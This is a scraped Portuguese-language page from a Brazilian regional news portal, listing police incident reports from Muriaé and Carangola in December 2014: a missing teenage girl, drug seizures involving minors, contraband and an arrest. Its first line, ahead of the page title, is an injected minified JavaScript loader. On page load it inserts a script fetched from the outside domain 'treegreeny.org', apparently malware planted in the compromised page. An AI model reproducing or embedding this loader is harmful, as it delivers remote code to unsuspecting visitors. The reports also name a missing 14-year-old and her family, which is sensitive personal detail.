;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola e Região - 22/12/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola e Região – 22/12/14.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 22/12/2014
76ª CIA PM – MURIAÉ-MG
PM REGISTRA COMUNICADO DE PESSOA DESAPARECIDA EM MURIAÉ

Em 19/12/2014, por volta das 09h, na Rua Vereador Jaci Vargas, no distrito de Pirapanema, SIRLEI CORRÊA DA SILVA, pai de TAUANA CORRÊA ELEUTERIO, 14 anos, disse que sua filha saiu de casa e não retornou, que encontrou no guarda-roupa da mesma um bilhete se despedindo da mãe, não revelando seu destino. Que sua outra filha viu uma “passagem” nas coisas de TAUANA, porém não sabe informar destino. Que TAUANA mantém contato com um cidadão de nome ANDERSON, vulgo NEGUIM, o qual trabalhou na empresa SOGENA, construção civil, veio de ILHÉUS/BAHIA e que saiu da empresa recentemente. Sendo o motivo do desaparecimento o não consentimento do namoro entre os dois.

PM LOCALIZA VEÍCULO PRODUTO DE FURTO EM MURIAÉ

Em 19/12/2014, por volta das 11h30min, na Rua João Micael, no Bairro São Joaquim, militares, localizaram a motocicleta HONDA CG 125 FAN, de CATAGUASES/MG, sendo esta furtada no dia 18/12/2014. Veículo removido ao pátio Detran.

PM EFETUA APREENSÃO DE MENOR POR TRÁFICO DE DROGAS EM MURIAÉ

Em 20/12/2014, por volta das 09h10min, na Rua Narciso Dias Rabelo, no Bairro União, militares avistaram N.R.S.M., de 14 anos, no escadão de acesso ao RIO PRETO, o qual evadiu, porém foi alcançado e encontrado em seu poder 02 papelotes de cocaína e, nas margens do rio, outros 43 papelotes e outra porção da mesma droga, um pouco maior. Que outra parte foi perdida na água do rio. O menor admitiu que teria assumido aquele local como sendo sua “boca de fumo”. O menor foi apreendido e conduzido à DPJ.
PM EFETUA PRISÃO DE AUTOR POR CONTRABANDO DE CIGARROS EM MURIAÉ

Em 20/12/2014, por volta das 22h10min, na Rua Getúlio Vargas, na Barra, após denúncias, militares visualizaram o veículo FORD/VERONA, cor cinza, realizando manobras de “zig-zag”, sendo este abordado e tendo como condutor A.S.T., de 31 anos, visivelmente embriagado. No porta-malas foram localizadas diversas embalagens de cigarros, bem como seis garrafas contendo dois litros cada de cachaça e o condutor não apresentou a nota fiscal dos produtos. O autor não quis realizar o teste do etilômetro. Veículo removido ao pátio DETRAN, materiais apreendidos, autor preso e conduzido à DPJ.

PM EFETUA APREENSÃO DE MENOR POR TRÁFICO ILÍCITO DE DROGAS EM BARÃO DO MONTE ALTO

Em 21/12/2014, por volta das 16h20min, na Rua Augusto Alves da Silva, no Arraial Velho, militares abordaram D.M.C., de 17 anos, o qual dispensou uma sacola plástica contendo 13 buchas de maconha, 01 vidro de loló e R$ 716,00. Foi dada voz de apreensão ao menor por tráfico de drogas e conduzido à DPJ.
75ª CIA PM – CARANGOLA-MG
PM EFETUA PRISÃO DE FORAGIDO DA JUSTIÇA EM CARANGOLA

Em 21/12/2014, por volta das 08h40min, na Rua Treze de Maio, no Santo Onofre, durante BLITZ de trânsito, militares abordaram M.S.A., de 31 anos, contra o qual havia um mandado de prisão em aberto, sendo este preso e conduzido à DPJ.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.